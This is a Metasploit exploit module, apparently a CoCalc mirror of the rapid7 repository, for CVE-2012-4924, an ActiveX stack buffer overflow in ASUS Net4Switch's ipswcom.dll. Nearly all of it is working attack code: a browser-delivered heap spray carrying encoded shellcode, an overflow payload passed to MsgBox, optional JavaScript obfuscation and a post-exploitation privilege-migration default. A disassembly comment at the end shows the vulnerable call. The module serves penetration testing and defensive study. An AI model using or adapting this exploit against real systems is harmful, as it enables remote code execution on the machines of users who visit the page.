Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll

18
          ActiveX control.  A buffer overflow condition is possible in multiple places due

19
          to the use of the CxDbgPrint() function, which allows remote attackers to gain

20
          arbitrary code execution under the context of the user.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Dmitriy Evdokimov', # Initial discovery, poc

25
          'sinn3r' # Metasploit

26
        ],

27
        'References' => [

28
          [ 'CVE', '2012-4924' ],

29
          [ 'OSVDB', '79438' ],

30
          [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=417' ]

31
        ],

32
        'Payload' => {

33
          'BadChars' => "\x00",

34
          'StackAdjustment' => -3500,

35
        },

36
        'DefaultOptions' => {

37
          'EXITFUNC' => "seh",

38
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          [ 'Automatic', {} ],

43
          [ 'IE 6 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ],

44
          [ 'IE 7 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ]

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2012-02-17',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])

60
      ]

61
    )

62
  end

63


64
  def get_target(agent)

65
    return target if target.name != 'Automatic'

66


67
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

68
      return targets[1]  # IE 6 on Windows XP SP3

69
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

70
      return targets[2]  # IE 7 on Windows XP SP3

71
    else

72
      return nil

73
    end

74
  end

75


76
  def on_request_uri(cli, request)

77
    agent = request.headers['User-Agent']

78
    my_target = get_target(agent)

79


80
    if my_target.nil?

81
      print_error("Browser not supported: #{agent.to_s}")

82
      send_not_found(cli)

83
      return

84
    end

85


86
    p = payload.encoded

87
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))

88
    nops = Rex::Text.to_unescape(make_nops(4))

89
    randnop = rand_text_alpha(rand(100) + 1)

90


91
    spray = <<-JS

92
    var heap_obj = new heapLib.ie(0x20000);

93
    var code = unescape("#{js_code}");

94
    var #{randnop} = "#{nops}";

95
    var nops = unescape(#{randnop});

96


97
    while (nops.length < 0x80000) nops += nops;

98
    var offset = nops.substring(0, #{my_target['Offset']});

99
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

100


101
    while (shellcode.length < 0x40000) shellcode += shellcode;

102
    var block = shellcode.substring(0, (0x80000-6)/2);

103


104
    heap_obj.gc();

105


106
    for (var i=1; i < 0x300; i++) {

107
      heap_obj.alloc(block);

108
    }

109
    JS

110


111
    spray = heaplib(spray, { :noobfu => true })

112


113
    js = <<-JS

114
    var obj = new ActiveXObject("ipswcom.IPSWComItf");

115


116
    #{spray}

117


118
    function generate_padding(d, s) {

119
      var tmp = d;

120
      while (tmp.length < s) {

121
        tmp += tmp;

122
      }

123
      var buf = tmp.substring(0, s/2);

124
      tmp = null;

125
      return buf;

126
    }

127


128
    var arg1 = generate_padding(unescape("%u4141"), 4);

129


130
    var arg2 = "A"; // Expands to 0x0041, helps us to align the stack

131
    arg2 += generate_padding(unescape("%u4343"), 2680);

132
    arg2 += unescape("%u4242%u4242");

133
    arg2 += unescape("%u0d0d%u0d0d");

134
    arg2 += generate_padding(unescape("%u0d0d"), #{my_target['Max']}-arg2.length);

135


136
    obj.MsgBox(arg1, arg2, 2);

137
    JS

138


139
    # obfuscate on demand

140
    if datastore['OBFUSCATE']

141
      js = ::Rex::Exploitation::JSObfu.new(js)

142
      js.obfuscate(memory_sensitive: true)

143
    end

144


145
    html = <<-EOS

146
    <html>

147
    <head>

148
    </head>

149
    <body>

150
    <script>

151
    #{js}

152
    </script>

153
    </body>

154
    </html>

155
    EOS

156


157
    html = html.gsub(/\t\t/, '')

158


159
    print_status("Sending HTML")

160
    send_response(cli, html, { 'Content-Type' => 'text/html' })

161
  end

162
end

163


164
=begin

165
Download:

166
http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html

167


168
clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E

169
C:\Program Files\ASUS\Net4Switch\ipswcom.dll

170


171
.text:10030523                 push    ecx

172
.text:10030524                 mov     eax, [ebp+arg_C]

173
.text:10030527                 mov     [ebp+var_4], eax

174
.text:1003052A                 cmp     [ebp+var_4], 0

175
.text:1003052E                 jz      short loc_10030541  <-- uType 10h

176
.text:10030530                 cmp     [ebp+var_4], 1

177
.text:10030534                 jz      short loc_10030573  <-- uType 44h

178
.text:10030536                 cmp     [ebp+var_4], 2

179
.text:1003053A                 jz      short loc_100305A5  <-- CxDbgPrint

180
...

181
.text:100305A5 loc_100305A5:                           ; CODE XREF: MsgBox+1Aj

182
.text:100305A5                 mov     eax, [ebp+lpText]

183
.text:100305A8                 push    eax

184
.text:100305A9                 push    offset aIpsw_alertS ; "[IPSW_alert] = %s"

185
.text:100305AE                 push    0FFh

186
.text:100305B3                 call    ds:CxDbgPrint

187
=end

188


189